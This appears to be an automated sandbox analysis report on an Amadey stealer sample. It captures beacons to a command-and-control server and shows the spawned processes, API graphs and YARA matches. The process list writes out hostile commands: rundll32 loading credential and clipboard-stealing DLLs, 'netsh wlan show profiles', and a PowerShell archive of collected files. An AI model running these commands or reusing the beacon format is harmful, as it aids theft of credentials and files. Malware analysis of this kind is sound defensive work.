                                                                                                    Timestamp: Apr 19, 2024 04:27:10.039843082 CEST | Bytes transferred: 158 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Timestamp: Apr 19, 2024 04:27:10.289077044 CEST | Bytes transferred: 219 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session ID: 83 | Source IP: 192.168.2.4 | Source Port: 49819 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:10.539391041 CEST | Bytes transferred: 310 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Timestamp: Apr 19, 2024 04:27:10.789206028 CEST | Bytes transferred: 196 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:10 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID: 84 | Source IP: 192.168.2.4 | Source Port: 49820 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:11.146917105 CEST | Bytes transferred: 158 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Timestamp: Apr 19, 2024 04:27:11.391524076 CEST | Bytes transferred: 219 | Direction: IN
                                                                                                    HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0


                                                                                                    Session ID: 85 | Source IP: 192.168.2.4 | Source Port: 49821 | Destination IP: 193.233.132.56 | Destination Port: 80 | PID: 5900 | Process: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp: Apr 19, 2024 04:27:11.642908096 CEST | Bytes transferred: 310 | Direction: OUT
                                                                                                    POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 154
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 30 41 35 34 46 43 46 46 46 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6CFF0A54FCFFFFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                    Apr 19, 2024 04:27:11.900167942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:11 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 7 <c><d>0


                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                    86 | 192.168.2.4 | 49822 | 193.233.132.56 | 80 | 5900 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                    Apr 19, 2024 04:27:12.265222073 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Host: 193.233.132.56
                                                                                                    Content-Length: 4
                                                                                                    Cache-Control: no-cache
                                                                                                    Data Raw: 73 74 3d 73
                                                                                                    Data Ascii: st=s
                                                                                                    Apr 19, 2024 04:27:12.510799885 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                    Date: Fri, 19 Apr 2024 02:27:12 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: keep-alive
                                                                                                    Refresh: 0; url = Login.php
                                                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 1 0



                                                                                                    Target ID:0
                                                                                                    Start time:04:25:08
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe"
                                                                                                    Imagebase:0xe10000
                                                                                                    File size:3'010'048 bytes
                                                                                                    MD5 hash:6AFD3B5B7EFFE4BB0500FE08DD1F6ED7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.1798578952.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:1
                                                                                                    Start time:04:25:12
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Imagebase:0x860000
                                                                                                    File size:3'010'048 bytes
                                                                                                    MD5 hash:6AFD3B5B7EFFE4BB0500FE08DD1F6ED7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000003.1844272709.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 45%, ReversingLabs
                                                                                                    • Detection: 54%, Virustotal, Browse
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:2
                                                                                                    Start time:04:25:15
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                                    Imagebase:0x860000
                                                                                                    File size:3'010'048 bytes
                                                                                                    MD5 hash:6AFD3B5B7EFFE4BB0500FE08DD1F6ED7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.1868196075.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    Target ID:6
                                                                                                    Start time:04:26:00
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                    Imagebase:0x860000
                                                                                                    File size:3'010'048 bytes
                                                                                                    MD5 hash:6AFD3B5B7EFFE4BB0500FE08DD1F6ED7
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000003.2311033083.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:7
                                                                                                    Start time:04:26:05
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                    Imagebase:0x3b0000
                                                                                                    File size:61'440 bytes
                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:8
                                                                                                    Start time:04:26:06
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                    Imagebase:0x7ff72bec0000
                                                                                                    File size:71'680 bytes
                                                                                                    MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:9
                                                                                                    Start time:04:26:06
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\netsh.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:netsh wlan show profiles
                                                                                                    Imagebase:0x7ff6050d0000
                                                                                                    File size:96'768 bytes
                                                                                                    MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    Target ID:10
                                                                                                    Start time:04:26:06
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:11
                                                                                                    Start time:04:26:07
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
                                                                                                    Imagebase:0x3b0000
                                                                                                    File size:61'440 bytes
                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                    Reputation:high
                                                                                                    Has exited:false

                                                                                                    Target ID:12
                                                                                                    Start time:04:26:07
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                                                                                                    Imagebase:0x7ff788560000
                                                                                                    File size:452'608 bytes
                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    Target ID:13
                                                                                                    Start time:04:26:07
                                                                                                    Start date:19/04/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:4.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:7%
                                                                                                      Total number of Nodes:429
                                                                                                      Total number of Limit Nodes:10
10455->10460 10456 e15d40 3 API calls 10456->10460 10457 e19385 shared_ptr std::invalid_argument::invalid_argument 10457->10445 10458 e1926f shared_ptr 10458->10457 10459 e15d40 3 API calls 10458->10459 10461 e193f7 shared_ptr ___std_exception_copy std::invalid_argument::invalid_argument 10459->10461 10460->10454 10460->10456 10460->10458 10461->10445 10303 e1a326 10304 e1a340 10303->10304 10305 e1a362 shared_ptr 10303->10305 10304->10305 10306 e1a41e 10304->10306 10309 e1a370 10305->10309 10319 e178b0 10305->10319 10310 e1a423 Sleep CreateMutexA 10306->10310 10308 e1a37e 10308->10309 10311 e178b0 4 API calls 10308->10311 10312 e1a45e 10310->10312 10313 e1a388 10311->10313 10313->10309 10314 e178b0 4 API calls 10313->10314 10315 e1a392 10314->10315 10315->10309 10316 e178b0 4 API calls 10315->10316 10317 e1a39c 10316->10317 10317->10309 10318 e178b0 4 API calls 10317->10318 10318->10309 10320 e17916 ___std_exception_copy 10319->10320 10353 e17a68 shared_ptr std::invalid_argument::invalid_argument 10320->10353 10354 e15d40 10320->10354 10322 e17952 10323 e15d40 3 API calls 10322->10323 10324 e1797f shared_ptr 10323->10324 10325 e17a53 GetNativeSystemInfo 10324->10325 10326 e17a57 10324->10326 10337 e17b06 ___std_exception_copy 10324->10337 10325->10326 10327 e17b94 10326->10327 10328 e17abf 10326->10328 10326->10353 10329 e15d40 3 API calls 10327->10329 10330 e15d40 3 API calls 10328->10330 10331 e17bc7 10329->10331 10332 e17ae7 10330->10332 10335 e15d40 3 API calls 10331->10335 10334 e15d40 3 API calls 10332->10334 10333 e15d40 3 API calls 10336 e17ef7 10333->10336 10334->10337 10339 e17be6 10335->10339 10338 e15d40 3 API calls 10336->10338 10337->10333 10337->10353 10338->10353 10340 e15d40 3 API calls 10339->10340 10341 e17c19 10340->10341 10342 e15d40 3 API calls 10341->10342 10343 e17c6a 10342->10343 10344 e15d40 3 API calls 10343->10344 10345 e17c89 10344->10345 10346 e15d40 3 API calls 10345->10346 10347 e17cbc 10346->10347 10348 e15d40 3 API calls 
10347->10348 10349 e17d0d 10348->10349 10350 e15d40 3 API calls 10349->10350 10351 e17d2c 10350->10351 10352 e15d40 3 API calls 10351->10352 10352->10353 10353->10308 10356 e15d84 shared_ptr ___std_exception_copy 10354->10356 10355 e15e5c shared_ptr std::invalid_argument::invalid_argument 10355->10322 10356->10355 10357 e15ee4 RegOpenKeyExA 10356->10357 10358 e15f41 RegCloseKey 10357->10358 10359 e15f17 RegQueryValueExA 10357->10359 10360 e15f67 shared_ptr std::invalid_argument::invalid_argument 10358->10360 10359->10358 10360->10322 10462 e12070 10465 e2dd8c 10462->10465 10464 e1207a 10466 e2ddb4 10465->10466 10467 e2dd9c 10465->10467 10466->10464 10467->10466 10469 e2e64e 10467->10469 10472 e2e365 10469->10472 10473 e2e373 InitializeCriticalSectionEx 10472->10473 10474 e2e388 10472->10474 10473->10474 10474->10467 10554 e141b0 10557 e139c0 10554->10557 10556 e141bb shared_ptr 10558 e139f9 10557->10558 10559 e13a39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10558->10559 10562 e13b38 10558->10562 10564 e131d0 10558->10564 10559->10556 10561 e131d0 5 API calls 10563 e13b5f 10561->10563 10562->10561 10562->10563 10563->10556 10565 e2dd3c GetSystemTimePreciseAsFileTime 10564->10565 10571 e13214 10565->10571 10566 e1326b 10567 e2d8fa 4 API calls 10566->10567 10568 e1323c __Mtx_unlock 10567->10568 10570 e2d8fa 4 API calls 10568->10570 10572 e13250 std::invalid_argument::invalid_argument 10568->10572 10573 e13277 10570->10573 10571->10566 10571->10568 10583 e2d3dc 10571->10583 10572->10562 10574 e2dd3c GetSystemTimePreciseAsFileTime 10573->10574 10575 e132af 10574->10575 10576 e2d8fa 4 API calls 10575->10576 10577 e132b6 __Cnd_broadcast 10575->10577 10576->10577 10578 e2d8fa 4 API calls 10577->10578 10579 e132d7 __Mtx_unlock 10577->10579 10578->10579 10580 e2d8fa 4 API calls 10579->10580 10581 e132eb 10579->10581 10582 e1330e 10580->10582 10581->10562 10582->10562 10586 e2d202 10583->10586 10585 e2d3ec 10585->10571 10587 e2d22c 10586->10587 10588 e2e5fb 
_xtime_get GetSystemTimePreciseAsFileTime 10587->10588 10589 e2d234 __Xtime_diff_to_millis2 std::invalid_argument::invalid_argument 10587->10589 10590 e2d25f __Xtime_diff_to_millis2 10588->10590 10589->10585 10590->10589 10591 e2e5fb _xtime_get GetSystemTimePreciseAsFileTime 10590->10591 10591->10589 10831 e17330 10832 e17371 shared_ptr 10831->10832 10833 e15d40 3 API calls 10832->10833 10835 e17403 shared_ptr 10832->10835 10833->10835 10834 e15d40 3 API calls 10837 e17563 10834->10837 10835->10834 10836 e174d3 shared_ptr std::invalid_argument::invalid_argument 10835->10836 10838 e15d40 3 API calls 10837->10838 10839 e17595 shared_ptr 10838->10839 10840 e15d40 3 API calls 10839->10840 10845 e17625 shared_ptr std::invalid_argument::invalid_argument 10839->10845 10841 e176fd 10840->10841 10842 e15d40 3 API calls 10841->10842 10843 e17720 10842->10843 10844 e15d40 3 API calls 10843->10844 10844->10845 10528 e12034 10531 e2dd1b 10528->10531 10530 e12040 10534 e2da65 10531->10534 10533 e2dd2b 10533->10530 10535 e2da7b 10534->10535 10536 e2da71 10534->10536 10535->10533 10537 e2da4e 10536->10537 10538 e2da2e 10536->10538 10543 e2e39a 10537->10543 10538->10535 10540 e2e365 __Mtx_init_in_situ InitializeCriticalSectionEx 10538->10540 10542 e2da47 10540->10542 10541 e2da60 10541->10533 10542->10533 10544 e2e3af RtlInitializeConditionVariable 10543->10544 10544->10541 10596 e14176 10599 e12310 10596->10599 10598 e1417f 10600 e12324 10599->10600 10603 e2cbbd 10600->10603 10611 e4517a 10603->10611 10605 e2cc35 ___std_exception_copy 10618 e2c83d 10605->10618 10607 e2cc28 10614 e2c5e6 10607->10614 10610 e1232a 10610->10598 10622 e465b9 10611->10622 10613 e2cbe5 10613->10605 10613->10607 10613->10610 10615 e2c62f ___std_exception_copy 10614->10615 10617 e2c642 shared_ptr 10615->10617 10626 e2ca2f 10615->10626 10617->10610 10619 e2c868 10618->10619 10621 e2c871 shared_ptr 10618->10621 10620 e2ca2f InitOnceExecuteOnce 10619->10620 10620->10621 10621->10610 10623 e465be 
___std_exception_copy 10622->10623 10623->10613 10624 e47c7d 3 API calls 10623->10624 10625 e4a252 10624->10625 10627 e2d56f InitOnceExecuteOnce 10626->10627 10629 e2ca71 10627->10629 10628 e2ca78 10628->10617 10629->10628 10630 e2d56f InitOnceExecuteOnce 10629->10630 10631 e2caf1 10630->10631 10631->10617 10375 e47cb9 10378 e47b57 10375->10378 10380 e47b65 10378->10380 10379 e47bb0 10380->10379 10383 e47bbb 10380->10383 10382 e47bba 10389 e4b922 GetPEB 10383->10389 10385 e47bc5 10386 e47bda 10385->10386 10387 e47bca GetPEB 10385->10387 10388 e47bf2 ExitProcess 10386->10388 10387->10386 10390 e4b93c 10389->10390 10390->10385 10642 e12d00 10643 e12d28 10642->10643 10644 e2dd1b __Mtx_init_in_situ 2 API calls 10643->10644 10645 e12d33 10644->10645 10680 e18280 10681 e18286 10680->10681 10682 e18288 GetFileAttributesA 10680->10682 10681->10682 10683 e18294 10682->10683 10781 e18600 10782 e1864c 10781->10782 10783 e15d40 3 API calls 10782->10783 10784 e18667 shared_ptr std::invalid_argument::invalid_argument 10783->10784 10299 e18282 10300 e18286 10299->10300 10301 e18288 GetFileAttributesA 10299->10301 10300->10301 10302 e18294 10301->10302 10632 e19547 10633 e19550 shared_ptr 10632->10633 10634 e1a423 Sleep CreateMutexA 10633->10634 10635 e1961b shared_ptr 10633->10635 10636 e1a45e 10634->10636 10818 e13b47 10819 e13b51 10818->10819 10820 e131d0 5 API calls 10819->10820 10821 e13b5f 10819->10821 10820->10821 10361 e15dc8 10363 e15dd6 shared_ptr ___std_exception_copy 10361->10363 10362 e15e5c shared_ptr std::invalid_argument::invalid_argument 10363->10362 10364 e15ee4 RegOpenKeyExA 10363->10364 10365 e15f41 RegCloseKey 10364->10365 10366 e15f17 RegQueryValueExA 10364->10366 10368 e15f67 shared_ptr 10365->10368 10366->10365 10367 e15fe7 shared_ptr std::invalid_argument::invalid_argument 10368->10367 10369 e15d40 3 API calls 10368->10369 10370 e16231 shared_ptr 10369->10370 10371 e15d40 3 API calls 10370->10371 10374 e163d2 shared_ptr 
std::invalid_argument::invalid_argument 10370->10374 10373 e162bd shared_ptr 10371->10373 10372 e15d40 3 API calls 10372->10373 10373->10372 10373->10374 10814 e13b8e 10815 e13b98 10814->10815 10816 e12310 4 API calls 10815->10816 10817 e13ba5 10815->10817 10816->10817 10295 e1a9d0 10296 e1aa22 10295->10296 10297 e1abdd CoInitialize 10296->10297 10298 e1ac2a shared_ptr std::invalid_argument::invalid_argument 10297->10298 10391 e1d8d0 recv 10392 e1d932 recv 10391->10392 10393 e1d967 recv 10392->10393 10395 e1d9a1 10393->10395 10394 e1dac3 std::invalid_argument::invalid_argument 10395->10394 10400 e2dd3c 10395->10400 10410 e2dae2 10400->10410 10402 e1dafe 10403 e2d8fa 10402->10403 10404 e2d922 ___std_exception_copy 10403->10404 10405 e2d904 10403->10405 10430 e47c7d 10404->10430 10405->10404 10406 e2d913 10405->10406 10427 e2d927 10406->10427 10411 e2db38 10410->10411 10413 e2db0a std::invalid_argument::invalid_argument 10410->10413 10411->10413 10416 e2e5fb 10411->10416 10413->10402 10414 e2db8d __Xtime_diff_to_millis2 10414->10413 10415 e2e5fb _xtime_get GetSystemTimePreciseAsFileTime 10414->10415 10415->10414 10417 e2e60a 10416->10417 10419 e2e617 __aulldvrm 10416->10419 10417->10419 10420 e2e5d4 10417->10420 10419->10414 10423 e2e27a 10420->10423 10424 e2e297 10423->10424 10425 e2e28b GetSystemTimePreciseAsFileTime 10423->10425 10424->10419 10425->10424 10433 e129e0 10427->10433 10429 e2d93e std::_Throw_future_error 10431 e47b57 3 API calls 10430->10431 10432 e47c8e 10431->10432 10436 e2d56f 10433->10436 10435 e129f4 __dosmaperr __freea 10435->10429 10439 e2e2c1 10436->10439 10440 e2e2cf InitOnceExecuteOnce 10439->10440 10442 e2d582 10439->10442 10440->10442 10442->10435 10481 e18450 10483 e185ba 10481->10483 10484 e184a8 shared_ptr 10481->10484 10482 e15d40 3 API calls 10482->10484 10484->10482 10484->10483 10684 e12a90 10685 e12ace 10684->10685 10686 e2ce8b TpReleaseWork 10685->10686 10687 e12adb shared_ptr std::invalid_argument::invalid_argument 10686->10687 
10785 e12a10 10786 e12a1a 10785->10786 10787 e12a1c 10785->10787 10788 e2d8fa 4 API calls 10787->10788 10789 e12a22 10788->10789 10485 e1205a 10486 e2dd8c InitializeCriticalSectionEx 10485->10486 10487 e12064 10486->10487 10688 e13e9f 10689 e13eb6 10688->10689 10690 e13ead 10688->10690 10691 e12310 4 API calls 10690->10691 10691->10689 10827 e2e75c 10828 e2e76c 10827->10828 10829 e2e814 10828->10829 10830 e2e810 RtlWakeAllConditionVariable 10828->10830

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      APIs
                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00000001,?), ref: 00E15F0D
                                                                                                      • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00E15F3B
                                                                                                      • RegCloseKey.KERNELBASE(?), ref: 00E15F47
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: $($NtUnmapViewOfSection$VUUU$h R$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                      • API String ID: 3677997916-1724677387
                                                                                                      • Opcode ID: dc8b497b55b61101f4a0aea0fb15ac8b4a450b688fda9c049ffd3c4fc66d0b83
                                                                                                      • Instruction ID: 83a3f901fdb2692660be7f7888a981d775a93001dae975782d73dc4fde6ada67
                                                                                                      • Opcode Fuzzy Hash: dc8b497b55b61101f4a0aea0fb15ac8b4a450b688fda9c049ffd3c4fc66d0b83
                                                                                                      • Instruction Fuzzy Hash: A6A233B1A002189BDF18DF68DC85BEEB7B5EF84304F109268F915B7281DB719AC4CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • ExitProcess.KERNEL32(?,?,00E47BBA,?,?,?,?,?,00E48C0E), ref: 00E47BF7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_e10000_SecuriteInfo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 524594d306df9b73e4ea0fc422842438a927f896b8823ec7ed206c7b66e0e208
